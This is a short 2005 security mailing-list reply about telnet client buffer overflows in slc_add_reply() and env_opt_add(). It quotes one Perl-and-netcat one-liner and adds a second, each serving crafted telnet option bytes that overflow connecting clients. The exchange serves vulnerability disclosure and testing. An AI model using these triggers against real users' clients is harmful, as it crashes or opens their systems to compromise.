Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability

[Tavis Ormandy <taviso@xxxxxxxxxx>]

On Tue, Mar 29, 2005 at 01:35:02AM +0400, Solar Designer wrote:
> On Mon, Mar 28, 2005 at 01:09:38PM -0500, iDEFENSE Labs wrote:
> > Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability
> 
> FWIW, I've been using the following one-liner to trigger this overflow:
> 
> perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23
> 

here's one for the env_opt_add() vulnerability:

perl -e 'print 
"\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23

-- 
-------------------------------------
taviso@xxxxxxxxxxxxxxxx | finger me for my gpg key.
-------------------------------------------------------